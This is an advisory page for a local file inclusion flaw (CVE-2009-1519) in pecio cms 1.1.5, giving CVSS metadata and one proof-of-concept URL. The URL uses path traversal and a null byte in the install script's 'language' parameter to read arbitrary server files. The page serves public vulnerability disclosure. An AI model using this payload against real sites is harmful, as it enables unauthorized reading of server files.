pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability

2009-05-05 / 2009-05-06

Credit: SirGod

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-1519

CWE: CWE-22

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

#######################################################################################################
[+] pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
#######################################################################################################

[+] Local File Inclusion

   PoC :

     http://127.0.0.1/[path]/install/index.php?step=2&language=../../../../../../../BOOTSECT.BAK%00

########################################################################################################

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.